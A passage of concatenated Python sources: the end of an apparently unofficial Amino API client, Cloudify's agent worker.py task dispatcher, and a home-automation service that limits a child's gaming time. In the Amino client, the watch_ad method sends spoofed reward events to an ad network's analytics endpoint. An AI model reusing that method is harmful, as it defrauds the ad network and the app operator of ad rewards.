"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: response = self.session.post(f"{self.api}/g/s-x{comId}/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["supportedLanguages"]
def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["storeSubscriptionItemList"]
def get_all_users(self, start: int = 0, size: int = 25):
"""
Get list of users of Amino.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
def accept_host(self, chatId: str, requestId: str):
data = json.dumps({})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def accept_organizer(self, chatId: str, requestId: str):
self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
response = self.session.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat
**Parameters**
- **chatId** - ID of the Chat
- **userId** - ID of the User
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def wallet_config(self, level: int):
"""
Changes ads config
**Parameters**
- **level** - Level of the ads.
- ``1``, ``2``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"adsLevel": level,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/wallet/ads/config", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_avatar_frames(self, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/avatar-frame?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.AvatarFrameList(json.loads(response.text)["avatarFrameList"]).AvatarFrameList
def upload_bubble_preview(self, file: BinaryIO) -> str:
"""
Upload bubble preview image to the amino servers. Authorization required.
**Parameters**
- **file** - PNG image to be uploaded.
**Returns**
- **Success** : Url of the bubble preview image uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload/target/chat-bubble-thumbnail", data=data, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def upload_bubble(self, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()["chatBubble"]["bubbleId"]
def change_bubble(self, bubbleId: str, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/{bubbleId}", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()
def create_custom_bubble(self, cover: BinaryIO, previewBackgroundUrl: BinaryIO, name: str, textColor: str = "#ffffff", linkColor: str = "#039eff", contentInsets: list = None, bubbleType: int = 1, zoomPoint: list = None, allowedSlots: list = None):
if not contentInsets: contentInsets = [26, 33, 18, 49]
if not zoomPoint: zoomPoint = [41, 44]
if not allowedSlots: allowedSlots = [{"y": -5, "x": 5, "align": 1}, {"y": 5, "x": -30, "align": 4}, {"y": 5, "x": 5, "align": 3}]
icon = self.upload_bubble_preview(previewBackgroundUrl)
cover = self.upload_bubble_preview(cover)
path = icon[len(icon) - 3:len(icon)]
config = json.dumps({
"status": 0,
"allowedSlots": allowedSlots,
"name": f"{name} (Costume) #0000000001",
"vertexInset": 0,
"contentInsets": contentInsets,
"coverImage": cover,
"bubbleType": bubbleType,
"zoomPoint": zoomPoint,
"version": 1,
"linkColor": linkColor,
"slots": None,
"previewBackgroundUrl": icon,
"id": "52a91df5-38e1-4433-b8d6-253630f1d2e8",
"color": textColor,
"backgroundPath": f"background.{path}"
})
with open("config.json", "w") as file:
file.write(config)
with open(f"background.png", "wb") as file:
file.write(self.session.get(icon).content)
zip = ZipFile("ChatBubble/bubble.zip", "w")
zip.write("config.json")
zip.write(f"background.png")
zip.close()
bubble = self.upload_bubble(open("ChatBubble/default.zip", "rb").read())
response = self.change_bubble(bubble, config=open("ChatBubble/bubble.zip", "rb").read())
if response.status_code != 200: return exceptions.CheckException(response)
else: return response.status_code
def watch_ad(self, uid: str = None):
data = headers.AdHeaders(uid if uid else self.userId).data
response = self.session.post("https://ads.tapdaq.com/v4/analytics/reward", json=data, headers=headers.AdHeaders().headers, proxies=self.proxies)
if response.status_code != 204: return exceptions.CheckException(response.status_code)
else: return response.status_code
|
worker.py
|
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############
import os
import sys
import time
import logging
import argparse
import traceback
import tempfile
import json
import subprocess
import shutil
import threading
from contextlib import contextmanager
from cloudify import plugin_installer
from cloudify_agent.api import utils
from cloudify_agent.api.factory import DaemonFactory
from cloudify_rest_client.exceptions import (
UserUnauthorizedError,
CloudifyClientError
)
from cloudify import constants, exceptions, state
from cloudify.context import CloudifyContext
from cloudify.models_states import ExecutionState
from cloudify.logs import setup_agent_logger
from cloudify.state import current_ctx
from cloudify.error_handling import (
serialize_known_exception,
deserialize_known_exception
)
from cloudify.amqp_client import (
AMQPConnection, TaskConsumer, NO_RESPONSE, STOP_AGENT
)
from cloudify.utils import get_manager_name, get_python_path
from cloudify_agent.operations import install_plugins, uninstall_plugins
from cloudify._compat import PY2, parse_version
SYSTEM_DEPLOYMENT = '__system__'
ENV_ENCODING = 'utf-8' # encoding for env variables
DEFAULT_MAX_WORKERS = 10
CLOUDIFY_DISPATCH = 'CLOUDIFY_DISPATCH'
PREINSTALLED_PLUGINS = [
'agent',
'diamond', # Stub for back compat
'script',
'cfy_extensions',
'default_workflows',
'worker_installer',
'cloudify_system_workflows',
'agent_installer',
]
class LockedFile(object):
"""Like a writable file object, but writes are under a lock.
Used for logging, so that multiple threads can write to the same logfile
safely (deployment.log).
We keep track of the number of users, so that we can close the file
only when the last one stops writing.
"""
SETUP_LOGGER_LOCK = threading.Lock()
LOGFILES = {}
@classmethod
def open(cls, fn):
"""Create a new LockedFile, or get a cached one if one for this
filename already exists.
"""
with cls.SETUP_LOGGER_LOCK:
if fn not in cls.LOGFILES:
if not os.path.exists(os.path.dirname(fn)):
os.mkdir(os.path.dirname(fn))
cls.LOGFILES[fn] = cls(fn)
rv = cls.LOGFILES[fn]
rv.users += 1
return rv
def __init__(self, filename):
self._filename = filename
self._f = None
self.users = 0
self._lock = threading.Lock()
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def write(self, data):
with self._lock:
if self._f is None:
self._f = open(self._filename, 'ab')
self._f.write(data)
self._f.flush()
def close(self):
with self.SETUP_LOGGER_LOCK:
self.users -= 1
if self.users == 0:
if self._f:
self._f.close()
self.LOGFILES.pop(self._filename)
class TimeoutWrapper(object):
def __init__(self, ctx, process):
self.timeout = ctx.timeout
self.timeout_recoverable = ctx.timeout_recoverable
self.timeout_encountered = False
self.process = process
self.timer = None
self.logger = logging.getLogger(__name__)
def _timer_func(self):
self.timeout_encountered = True
self.logger.warning("Terminating subprocess; PID=%d...",
self.process.pid)
self.process.terminate()
for i in range(10):
if self.process.poll() is not None:
return
self.logger.warning("Subprocess still alive; waiting...")
time.sleep(0.5)
self.logger.warning("Subprocess still alive; sending KILL signal")
self.process.kill()
self.logger.warning("Subprocess killed")
def __enter__(self):
if self.timeout:
self.timer = threading.Timer(self.timeout, self._timer_func)
self.timer.start()
return self
def __exit__(self, *args):
if self.timer:
self.timer.cancel()
class CloudifyOperationConsumer(TaskConsumer):
routing_key = 'operation'
def __init__(self, *args, **kwargs):
self._process_registry = kwargs.pop('registry', None)
self._plugin_version_cache = {}
super(CloudifyOperationConsumer, self).__init__(*args, **kwargs)
def _print_task(self, ctx, action, status=None):
if ctx.task_type in ['workflow', 'hook']:
prefix = '{0} {1}'.format(action, ctx.task_type)
suffix = ''
elif ctx.type == constants.NODE_INSTANCE:
prefix = '{0} operation'.format(action)
suffix = '\n\tNode ID: {0}'.format(ctx.node.id)
else:
prefix = ''
suffix = ''
if status:
suffix += '\n\tStatus: {0}'.format(status)
logger.info(
'\n\t%(prefix)s on queue `%(queue)s` on tenant `%(tenant)s`:\n'
'\tTask name: %(name)s\n'
'\tExecution ID: %(execution_id)s\n'
'\tWorkflow ID: %(workflow_id)s%(suffix)s\n',
{'tenant': ctx.tenant_name,
'prefix': prefix,
'name': ctx.task_name,
'queue': ctx.task_target,
'execution_id': ctx.execution_id,
'workflow_id': ctx.workflow_id,
'suffix': suffix})
@staticmethod
def _validate_not_cancelled(ctx):
"""
This method will validate if the current running tasks is cancelled
or not
:param handler:
:param ctx:
"""
# We need also to handle old tasks still in queue and not picked by
# the worker so that we can ignore them as the state of the
# execution is cancelled and ignore pending tasks picked by the
# worker but still not executed. Morever,we need to handle a case when
# resume workflow is running while there are some old operations
# tasks still in the queue which holds an invalid execution token
# which could raise 401 error
# Need to use the context associated with the that task
with state.current_ctx.push(ctx):
try:
# Get the status of the current execution so that we can
# tell if the current running task can be run or not
current_execution = ctx.get_execution()
if current_execution:
logger.info(
'The current status of the execution is {0}'
''.format(current_execution.status)
)
# If the current execution task is cancelled, that means
# some this current task was on the queue when the previous
# cancel operation triggered, so we need to ignore running
# such tasks from the previous execution which was
# cancelled
if current_execution.status == ExecutionState.CANCELLED:
raise exceptions.ProcessKillCancelled()
else:
raise exceptions.NonRecoverableError(
'No execution available'
)
except UserUnauthorizedError:
# This means that Execution token is no longer valid since
# there is a new token re-generated because of resume workflow
raise exceptions.ProcessKillCancelled()
@contextmanager
def _update_operation_state(self, ctx, common_version):
if common_version < parse_version('6.2.0'):
# plugin's common is old - it does the operation state bookkeeping
# by itself.
yield
return
store = True
try:
op = ctx.get_operation()
except CloudifyClientError as e:
if e.status_code == 404:
op = None
store = False
else:
raise
if op and op.state == constants.TASK_STARTED:
# this operation has been started before? that means we're
# resuming a re-delivered operation
ctx.resume = True
if store:
ctx.update_operation(constants.TASK_STARTED)
try:
yield
finally:
if store:
ctx.update_operation(constants.TASK_RESPONSE_SENT)
def _plugin_common_version(self, executable, env):
"""The cloudify-common version included in the venv at executable.
Old cloudify-common versions have a slightly different interface,
so we need to figure out what version each plugin uses.
"""
if executable not in self._plugin_version_cache:
get_version_script = (
'import pkg_resources; '
'print(pkg_resources.require("cloudify-common")[0].version)'
)
try:
version_output = subprocess.check_output(
[executable, '-c', get_version_script], env=env
).decode('utf-8')
version = parse_version(version_output)
# also strip any possible .dev1 etc suffixes
version = parse_version(version.base_version)
except subprocess.CalledProcessError:
# we couldn't get it? it's most likely very old
version = parse_version('0.0.0')
self._plugin_version_cache[executable] = version
return self._plugin_version_cache[executable]
def handle_task(self, full_task):
task = full_task['cloudify_task']
raw_ctx = task['kwargs'].pop('__cloudify_context')
ctx = CloudifyContext(raw_ctx)
task_args = task.get('args', [])
task_kwargs = task['kwargs']
self._print_task(ctx, 'Started handling')
try:
self._validate_not_cancelled(ctx)
rv = self.dispatch_to_subprocess(ctx, task_args, task_kwargs)
result = {'ok': True, 'result': rv}
status = 'SUCCESS - result: {0}'.format(result)
except exceptions.StopAgent:
result = STOP_AGENT
status = 'Stopping agent'
except exceptions.OperationRetry as e:
result = {'ok': False, 'error': serialize_known_exception(e)}
status = 'Operation rescheduled'
except exceptions.ProcessKillCancelled:
self._print_task(ctx, 'Task kill-cancelled')
return NO_RESPONSE
except Exception as e:
error = serialize_known_exception(e)
result = {'ok': False, 'error': error}
status = 'ERROR - result: {0}'.format(result)
logger.error(
'ERROR - caught: %r%s',
e,
'\n{0}'.format(error['traceback'])
if error.get('traceback') else ''
)
self._print_task(ctx, 'Finished handling', status)
return result
def dispatch_to_subprocess(self, ctx, task_args, task_kwargs):
# inputs.json, output.json and output are written to a temporary
# directory that only lives during the lifetime of the subprocess
dispatch_dir = None
try:
if ctx.bypass_maintenance:
os.environ[constants.BYPASS_MAINTENANCE] = 'True'
env = self._build_subprocess_env(ctx)
if self._uses_external_plugin(ctx):
plugin_dir = self._extract_plugin_dir(ctx)
if plugin_dir is None:
self._install_plugin(ctx)
plugin_dir = self._extract_plugin_dir(ctx)
if plugin_dir is None:
raise RuntimeError(
'Plugin was not installed: {0}'
.format(ctx.plugin.name))
executable = get_python_path(plugin_dir)
else:
executable = sys.executable
env['PATH'] = os.pathsep.join([
os.path.dirname(executable), env['PATH']
])
split = ctx.task_name.split('.')
dispatch_dir = tempfile.mkdtemp(prefix='task-{0}.{1}-'.format(
split[0], split[-1]))
command_args = [executable, '-u', '-m', 'cloudify.dispatch',
dispatch_dir]
common_version = self._plugin_common_version(executable, env)
with self._update_operation_state(ctx, common_version):
with open(os.path.join(dispatch_dir, 'input.json'), 'w') as f:
json.dump({
'cloudify_context': ctx._context,
'args': task_args,
'kwargs': task_kwargs
}, f)
self.run_subprocess(ctx, command_args,
env=env,
bufsize=1,
close_fds=os.name != 'nt')
with open(os.path.join(dispatch_dir, 'output.json')) as f:
dispatch_output = json.load(f)
return self._handle_subprocess_output(dispatch_output)
finally:
if dispatch_dir:
shutil.rmtree(dispatch_dir, ignore_errors=True)
def _handle_subprocess_output(self, dispatch_output):
if dispatch_output['type'] == 'result':
return dispatch_output['payload']
elif dispatch_output['type'] == 'error':
e = dispatch_output['payload']
error = deserialize_known_exception(e)
error.causes.append({
'message': e['message'],
'type': e['exception_type'],
'traceback': e.get('traceback')
})
raise error
else:
raise exceptions.NonRecoverableError(
'Unexpected output type: {0}'
.format(dispatch_output['type']))
def _build_subprocess_env(self, ctx):
env = os.environ.copy()
# marker for code that only gets executed when inside the dispatched
# subprocess, see usage in the imports section of this module
env[CLOUDIFY_DISPATCH] = 'true'
# This is used to support environment variables configurations for
# central deployment based operations. See workflow_context to
# understand where this value gets set initially
# Note that this is received via json, so it is unicode. It must
# be encoded, because environment variables must be bytes.
execution_env = ctx.execution_env
if PY2:
execution_env = dict((k.encode(ENV_ENCODING),
v.encode(ENV_ENCODING))
for k, v in execution_env.items())
env.update(execution_env)
if ctx.bypass_maintenance:
env[constants.BYPASS_MAINTENANCE] = 'True'
return env
def _uses_external_plugin(self, ctx):
"""Whether this operation uses a plugin that is not built-in"""
if not ctx.plugin.name:
return False
if ctx.plugin.name in PREINSTALLED_PLUGINS:
return False
return True
def _extract_plugin_dir(self, ctx):
return ctx.plugin.prefix
def _install_plugin(self, ctx):
with state.current_ctx.push(ctx):
# source plugins are per-deployment/blueprint, while non-source
# plugins are expected to be "managed", ie. uploaded to the manager
if ctx.plugin.source:
dep_id = ctx.deployment.id
bp_id = ctx.blueprint.id
else:
dep_id = None
bp_id = None
plugin_installer.install(
ctx.plugin._plugin_context,
deployment_id=dep_id,
blueprint_id=bp_id)
def run_subprocess(self, ctx, *subprocess_args, **subprocess_kwargs):
subprocess_kwargs.setdefault('stderr', subprocess.STDOUT)
subprocess_kwargs.setdefault('stdout', subprocess.PIPE)
p = subprocess.Popen(*subprocess_args, **subprocess_kwargs)
if self._process_registry:
self._process_registry.register(ctx.execution_id, p)
with TimeoutWrapper(ctx, p) as timeout_wrapper:
with self.logfile(ctx) as f:
while True:
line = p.stdout.readline()
if line:
f.write(line)
if p.poll() is not None:
break
cancelled = False
if self._process_registry:
cancelled = self._process_registry.is_cancelled(ctx.execution_id)
self._process_registry.unregister(ctx.execution_id, p)
if timeout_wrapper.timeout_encountered:
message = 'Process killed due to timeout of %d seconds' % \
timeout_wrapper.timeout
if p.poll() is None:
message += ', however it has not stopped yet; please check ' \
'process ID {0} manually'.format(p.pid)
exception_class = exceptions.RecoverableError if \
timeout_wrapper.timeout_recoverable else \
exceptions.NonRecoverableError
raise exception_class(message)
if p.returncode in (-15, -9): # SIGTERM, SIGKILL
if cancelled:
raise exceptions.ProcessKillCancelled()
raise exceptions.NonRecoverableError('Process terminated (rc={0})'
.format(p.returncode))
if p.returncode != 0:
raise exceptions.NonRecoverableError(
'Unhandled exception occurred in operation dispatch (rc={0})'
.format(p.returncode))
def logfile(self, ctx):
try:
handler_context = ctx.deployment.id
except AttributeError:
handler_context = SYSTEM_DEPLOYMENT
else:
# an operation may originate from a system wide workflow.
# in that case, the deployment id will be None
handler_context = handler_context or SYSTEM_DEPLOYMENT
log_name = os.path.join(os.environ.get('AGENT_LOG_DIR', ''), 'logs',
'{0}.log'.format(handler_context))
return LockedFile.open(log_name)
class ServiceTaskConsumer(TaskConsumer):
routing_key = 'service'
service_tasks = {
'ping': 'ping_task',
'cluster-update': 'cluster_update_task',
'cancel-operation': 'cancel_operation_task',
'replace-ca-certs': 'replace_ca_certs_task',
'install-plugin': 'install_plugin_task',
'uninstall-plugin': 'uninstall_plugin_task',
}
def __init__(self, name, *args, **kwargs):
self.name = name
self._operation_registry = kwargs.pop('operation_registry')
super(ServiceTaskConsumer, self).__init__(*args, **kwargs)
def handle_task(self, full_task):
task = full_task['service_task']
task_name = task['task_name']
kwargs = task['kwargs']
logger.info(
'Received `{0}` service task with kwargs: {1}'.format(
task_name, kwargs))
task_handler = getattr(self, self.service_tasks[task_name])
result = task_handler(**kwargs)
logger.info('Result: {0}'.format(result))
return result
def ping_task(self):
return {'time': time.time()}
def install_plugin_task(self, plugin, rest_token, tenant,
rest_host, target=None, bypass_maintenance=False):
if target:
# target was provided, so this is to be installed only on the
# specified workers, but might have been received by us because
# it was sent to a fanout exchange.
# This only matters for mgmtworkers, because agents have no
# fanout exchanges.
if get_manager_name() not in target:
return
class _EmptyID(object):
id = None
class PluginInstallCloudifyContext(object):
"""A CloudifyContext that has just enough data to install plugins
"""
def __init__(self):
self.rest_host = rest_host
self.tenant_name = tenant['name']
self.rest_token = rest_token
self.execution_token = None
self.logger = logging.getLogger('plugin')
# deployment/blueprint are not defined for force-installs,
# but the ctx demands they be objects with an .id
self.deployment = _EmptyID()
self.blueprint = _EmptyID()
self.bypass_maintenance = bypass_maintenance
with current_ctx.push(PluginInstallCloudifyContext()):
install_plugins([plugin])
def uninstall_plugin_task(self, plugin, rest_token, tenant,
rest_host, target=None,
bypass_maintenance=False):
if target:
# target was provided, so this is to be installed only on the
# specified workers, but might have been received by us because
# it was sent to a fanout exchange.
# This only matters for mgmtworkers, because agents have no
# fanout exchanges.
if get_manager_name() not in target:
return
class _EmptyID(object):
id = None
class PluginUninstallCloudifyContext(object):
"""A CloudifyContext that has just enough data to uninstall plugins
"""
def __init__(self):
self.rest_host = rest_host
self.tenant_name = tenant['name']
self.rest_token = rest_token
self.execution_token = None
self.logger = logging.getLogger('plugin')
# deployment/blueprint are not defined for force-installs,
# but the ctx demands they be objects with an .id
self.deployment = _EmptyID()
self.blueprint = _EmptyID()
self.bypass_maintenance = bypass_maintenance
with current_ctx.push(PluginUninstallCloudifyContext()):
uninstall_plugins([plugin])
def cluster_update_task(self, brokers, broker_ca, managers, manager_ca):
"""Update the running agent with the new cluster.
When a node is added or removed from the cluster, the agent will
receive the current cluster nodes in this task. We need to update
both the current process envvars, the cert files, and all the
daemon config files.
"""
self._assert_name('cluster-update')
factory = DaemonFactory()
daemon = factory.load(self.name)
os.environ[constants.REST_HOST_KEY] = \
u','.join(managers).encode('utf-8')
with open(daemon.local_rest_cert_file, 'w') as f:
f.write(manager_ca)
with open(daemon.broker_ssl_cert_path, 'w') as f:
f.write(broker_ca)
daemon.rest_host = managers
daemon.broker_ip = brokers
daemon.create_broker_conf()
daemon.create_config()
factory.save(daemon)
def cancel_operation_task(self, execution_id):
logger.info('Cancelling task %s', execution_id)
self._operation_registry.cancel(execution_id)
def replace_ca_certs_task(self, new_manager_ca, new_broker_ca):
"""Update the running agent with new CAs."""
self._assert_name('replace-ca-certs')
factory = DaemonFactory()
daemon = factory.load(self.name)
if new_broker_ca:
with open(daemon.broker_ssl_cert_path, 'w') as f:
f.write(new_broker_ca)
daemon.create_broker_conf()
if new_manager_ca:
with open(daemon.local_rest_cert_file, 'w') as f:
f.write(new_manager_ca)
daemon.create_config()
factory.save(daemon)
def _assert_name(self, command_name):
if not self.name:
raise RuntimeError('{0} sent to agent with no name '
'set'.format(command_name))
def _setup_excepthook(daemon_name):
# Setting a new exception hook to catch any exceptions
# on agent startup and write them to a file. This file
# is later read for querying if celery has started successfully.
current_excepthook = sys.excepthook
def new_excepthook(exception_type, value, the_traceback):
# use the storage directory because the work directory might have
# been created under a different user, in which case we don't have
# permissions to write to it.
storage = utils.internal.get_daemon_storage_dir()
if not os.path.exists(storage):
os.makedirs(storage)
error_dump_path = os.path.join(
utils.internal.get_daemon_storage_dir(),
'{0}.err'.format(daemon_name))
with open(error_dump_path, 'w') as f:
f.write('Type: {0}\n'.format(exception_type))
f.write('Value: {0}\n'.format(value))
traceback.print_tb(the_traceback, file=f)
current_excepthook(exception_type, value, the_traceback)
sys.excepthook = new_excepthook
class ProcessRegistry(object):
"""A registry for dispatch subprocesses.
The dispatch TaskHandler uses this to register the subprocesses that
are running and executing a task, so that they can be cancelled/killed
from outside.
"""
def __init__(self):
self._processes = {}
self._cancelled = set()
def register(self, execution_id, process):
self._processes.setdefault(execution_id, []).append(process)
def unregister(self, execution_id, process):
try:
self._processes[execution_id].remove(process)
except (KeyError, ValueError):
pass
if not self._processes[execution_id] and \
execution_id in self._cancelled:
self._cancelled.remove(execution_id)
def cancel(self, execution_id):
self._cancelled.add(execution_id)
threads = [
threading.Thread(target=self._stop_process, args=(p,))
for p in self._processes.get(execution_id, [])
]
for thread in threads:
thread.start()
def _stop_process(self, process):
"""Stop the process: SIGTERM, and after 5 seconds, SIGKILL
Note that on windows, both terminate and kill are effectively
the same operation."""
process.terminate()
for i in range(10):
if process.poll() is not None:
return
time.sleep(0.5)
process.kill()
def is_cancelled(self, execution_id):
return execution_id in self._cancelled
def make_amqp_worker(args):
operation_registry = ProcessRegistry()
handlers = [
CloudifyOperationConsumer(args.queue, args.max_workers,
registry=operation_registry),
ServiceTaskConsumer(args.name, args.queue, args.max_workers,
operation_registry=operation_registry),
]
return AMQPConnection(handlers=handlers,
name=args.name,
connect_timeout=None)
def main():
global logger
parser = argparse.ArgumentParser()
parser.add_argument('--queue')
parser.add_argument('--max-workers', default=DEFAULT_MAX_WORKERS, type=int)
parser.add_argument('--name')
parser.add_argument('--hooks-queue')
args = parser.parse_args()
if args.name:
_setup_excepthook(args.name)
logger = logging.getLogger('worker.{0}'.format(args.name))
setup_agent_logger(args.name)
while True:
worker = make_amqp_worker(args)
try:
worker.consume()
except Exception:
logger.exception('Error while reading from rabbitmq')
time.sleep(1)
if __name__ == '__main__':
main()
|
PowerUsageService.py
|
# -*- coding: utf-8 -*-
'''
@author: davandev
'''
import logging
import os
import traceback
import sys
import time
import davan.util.timer_functions as timer_functions
import davan.util.helper_functions as helper
import davan.config.config_creator as configuration
import davan.util.constants as constants
from davan.http.service.reoccuring_base_service import ReoccuringBaseService
from threading import Thread,Event
class PowerUsageService(ReoccuringBaseService):
'''
Monitor usage of a device controlled by a powerplug.
'''
def __init__(self, service_provider, config):
'''
Constructor
'''
ReoccuringBaseService.__init__(self,constants.POWER_USAGE_SERVICE_NAME, service_provider, config)
self.logger = logging.getLogger(os.path.basename(__file__))
self.start_time =""
self.stop_time= ""
self.configured_usage_time = 3600
self.local_event = None
self.timeleft = self.configured_usage_time
self.actual_usage_time = 0
self.current_status = "Off"
def get_next_timeout(self):
'''
Return time until next timeout, only once per day.
'''
self.time_to_next_event = timer_functions.calculate_time_until_midnight()
self.logger.debug("Next timeout in " + str(self.time_to_next_event) + " seconds")
return self.time_to_next_event
def handle_timeout(self):
'''
Reset the time to play every night
'''
self.logger.info("Resetting play monitor")
self.timeleft = self.configured_usage_time
self.actual_usage_time = 0
def handle_request(self, msg):
'''
'''
try:
self.increment_invoked()
state = self.parse_request(msg)
self.logger.debug("State = " + state)
if state.lower() == "on":
self.start_count_down()
else:
self.stop_count_down()
except:
self.logger.error(traceback.format_exc())
self.increment_errors()
self.logger.error("Failed to handle power usage request")
return constants.RESPONSE_NOT_OK, constants.MIME_TYPE_HTML, constants.RESPONSE_FAILED_TO_PARSE_REQUEST
return constants.RESPONSE_OK, constants.MIME_TYPE_HTML, constants.RESPONSE_EMPTY_MSG
def start_count_down(self):
self.logger.info("Starting timer, time left [ "+str(self.timeleft)+" ]")
self.current_status = "On"
self.local_event = Event()
self.start_time = time.time()
def countdown():
try:
self.increment_invoked()
while not self.local_event.wait(self.timeleft):
self.time_is_out()
except:
self.logger.error(traceback.format_exc())
self.increment_errors()
Thread(target=countdown).start()
return self.local_event.set
def stop_count_down(self):
'''
Manual stop of count down
'''
self.logger.info("Stopping timer")
self.local_event.set()
self.current_status = "Off"
self.stop_time = time.time()
diff = self.stop_time - self.start_time
if (diff<self.timeleft):
self.timeleft -=diff
else:
self.timeleft = 0
self.actual_usage_time += diff
self.logger.debug("Time left[ " + str(self.timeleft) + " ] Usage time[" + str(self.actual_usage_time) + "]")
def time_is_out(self):
'''
Callback function when time is out
'''
self.logger.info("Time is out!")
self.local_event.set()
self.timeleft = 0
self.actual_usage_time = self.configured_usage_time
# Restart time measurement when timeleft == 0
self.start_time = time.time()
msg = "Viggo har nu använt upp all sin speltid"
helper.send_telegram_message(self.config, msg)
self.services.get_service(
constants.TTS_SERVICE_NAME).start(
helper.encode_message(
msg),constants.SPEAKER_KITCHEN)
def parse_request(self, msg):
'''
Return camera name from received msg.
'''
self.logger.debug("Parsing: " + msg )
msg = msg.replace("/PowerUsageService?device=1&state=", "")
return msg
def has_html_gui(self):
"""
Override if service has gui
"""
return True
def get_html_gui(self, column_id):
"""
Override and provide gui
"""
if self.actual_usage_time > 60:
usage = str(self.actual_usage_time/60)
else:
usage = self.actual_usage_time
column = constants.COLUMN_TAG.replace("<COLUMN_ID>", str(column_id))
column = column.replace("<SERVICE_NAME>", self.service_name)
column = column.replace("<SERVICE_VALUE>", "Status: " + str(self.current_status) + "\nTime left: " + str(self.timeleft) + "\nActual usage: "+str(usage))
return column
def get_announcement(self):
'''
Compose and encode announcement data
'''
self.logger.info("Create powerusage announcement")
announcement = "Viggo, du har "
announcement += str(self.timeleft)
announcement += " sekunder kvar att spela idag"
announcement = " och du har spelat totalt"
announcement += str(self.timeleft/60)
announcement += " minuter idag "
return helper.encode_message(announcement)
if __name__ == '__main__':
import time
from davan.util import application_logger as log_config
config = configuration.create()
